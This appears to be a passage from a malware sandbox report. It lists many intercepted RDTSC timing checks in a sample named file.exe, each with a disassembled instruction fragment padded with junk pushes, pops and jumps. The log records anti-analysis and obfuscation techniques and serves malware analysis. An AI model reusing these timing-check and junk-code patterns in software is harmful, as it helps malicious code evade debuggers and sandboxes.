                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684D19 second address: 684D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684D26 second address: 684D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684E97 second address: 684EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FBF78ADB276h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685190 second address: 6851A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FBF78E7B35Ah 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6851A6 second address: 6851D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB280h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF78ADB281h 0x00000011 jnc 00007FBF78ADB276h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685368 second address: 68536C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688C2C second address: 5018F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF78ADB27Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 5B82BE00h 0x00000011 jg 00007FBF78ADB279h 0x00000017 movzx esi, bx 0x0000001a push dword ptr [ebp+122D0971h] 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FBF78ADB278h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a call dword ptr [ebp+122D32F9h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D27BBh], eax 0x00000047 clc 0x00000048 xor eax, eax 0x0000004a jmp 00007FBF78ADB27Bh 0x0000004f or dword ptr [ebp+122D32DEh], esi 0x00000055 mov edx, dword ptr [esp+28h] 0x00000059 jmp 00007FBF78ADB286h 0x0000005e mov dword ptr [ebp+122D366Ah], eax 0x00000064 jg 00007FBF78ADB281h 0x0000006a pushad 0x0000006b or dword ptr [ebp+122D27BBh], ecx 0x00000071 movzx eax, ax 0x00000074 popad 0x00000075 mov esi, 0000003Ch 0x0000007a jmp 00007FBF78ADB282h 0x0000007f add esi, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D1C60h], edx 0x00000089 lodsw 0x0000008b mov dword ptr [ebp+122D32DEh], edi 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 cmc 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a mov dword ptr [ebp+122D27BBh], edi 0x000000a0 nop 0x000000a1 pushad 0x000000a2 pushad 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688DEE second address: 688E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Fh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FBF78E7B358h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D27BBh], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FBF78E7B358h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D352Ah] 0x00000050 clc 0x00000051 push B59AAAA4h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FBF78E7B35Bh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68906C second address: 689070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689070 second address: 68907A instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68907A second address: 689097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FBF78ADB27Eh 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689097 second address: 6890BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FBF78E7B367h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6890BD second address: 6890F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78ADB27Ch 0x00000008 jnl 00007FBF78ADB276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 ja 00007FBF78ADB285h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF78ADB27Bh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6890F7 second address: 689101 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8A8D second address: 6A8AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF78ADB27Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8AA0 second address: 6A8AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8AA6 second address: 6A8AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBF78ADB283h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8AC8 second address: 6A8ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8ACE second address: 6A8AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF78ADB276h 0x0000000a popad 0x0000000b jl 00007FBF78ADB27Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6B17 second address: 6A6B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FBF78E7B358h 0x0000000f popad 0x00000010 jl 00007FBF78E7B366h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6B41 second address: 6A6B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6CBE second address: 6A6CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6CCF second address: 6A6CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73DB second address: 6A73ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73ED second address: 6A73F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73F1 second address: 6A73F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7539 second address: 6A7547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FBF78ADB276h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7547 second address: 6A7564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FBF78E7B363h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B58 second address: 6A7B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB287h 0x00000008 jbe 00007FBF78ADB276h 0x0000000e popad 0x0000000f js 00007FBF78ADB27Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BED4 second address: 69BF0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007FBF78E7B356h 0x00000015 jmp 00007FBF78E7B367h 0x0000001a popad 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF0D second address: 69BF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF78ADB276h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FFF5 second address: 66FFFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A83EB second address: 6A840A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF78ADB276h 0x0000000a jmp 00007FBF78ADB284h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D528 second address: 67D52E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACCE0 second address: 6ACCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78ADB280h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABB2B second address: 6ABB35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD383 second address: 6AD388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B33CD second address: 6B33DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBF78E7B356h 0x00000009 jns 00007FBF78E7B356h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2A2A second address: 6B2A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3046 second address: 6B304A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B304A second address: 6B3050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3050 second address: 6B3068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B362h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B31BC second address: 6B31E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FBF78ADB27Eh 0x0000000e jmp 00007FBF78ADB283h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B31E5 second address: 6B3213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78E7B366h 0x00000008 jmp 00007FBF78E7B363h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6067 second address: 6B6075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF78ADB276h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B613F second address: 6B6176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnc 00007FBF78E7B35Eh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FBF78E7B35Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FBF78E7B35Ch 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B67C7 second address: 6B67D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B69F0 second address: 6B69F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B69F6 second address: 6B69FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6F68 second address: 6B6F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6F6C second address: 6B6FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FBF78ADB284h 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FBF78ADB278h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007FBF78ADB27Ah 0x0000002d or edi, 63ACF006h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jbe 00007FBF78ADB27Ch 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6FC8 second address: 6B6FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7401 second address: 6B7405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7560 second address: 6B756A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B756A second address: 6B7578 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7578 second address: 6B757C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8486 second address: 6B848B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B848B second address: 6B8491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8491 second address: 6B8495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B94A5 second address: 6B94A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B94A9 second address: 6B94BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B94BF second address: 6B94DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78E7B35Eh 0x00000008 ja 00007FBF78E7B356h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAB8D second address: 6BABA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABA5 second address: 6BABAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABAF second address: 6BAC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78ADB276h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+1246151Eh], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FBF78ADB278h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f je 00007FBF78ADB276h 0x00000035 mov edi, eax 0x00000037 push 00000000h 0x00000039 add esi, 5645BAD5h 0x0000003f xchg eax, ebx 0x00000040 pushad 0x00000041 jo 00007FBF78ADB278h 0x00000047 push eax 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jo 00007FBF78ADB276h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAC07 second address: 6BAC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAC15 second address: 6BAC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAC19 second address: 6BAC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB6C3 second address: 6BB718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FBF78ADB278h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D30B6h], ecx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 mov edi, 53DCF6B5h 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC1BC second address: 6BC1E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FBF78E7B369h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFABE second address: 6BFAC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFAC2 second address: 6BFAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFAC8 second address: 6BFACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFACE second address: 6BFAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB450 second address: 6BB462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0F60 second address: 6C0F65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C01D7 second address: 6C01DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0F65 second address: 6C0FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FBF78E7B35Fh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBF78E7B358h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 or dword ptr [ebp+122D186Fh], edx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FBF78E7B358h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov di, cx 0x0000004d push 00000000h 0x0000004f cmc 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 jmp 00007FBF78E7B367h 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C01DF second address: 6C01E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FE9 second address: 6C0FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FEF second address: 6C0FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C11EC second address: 6C11F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C45BE second address: 6C45C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
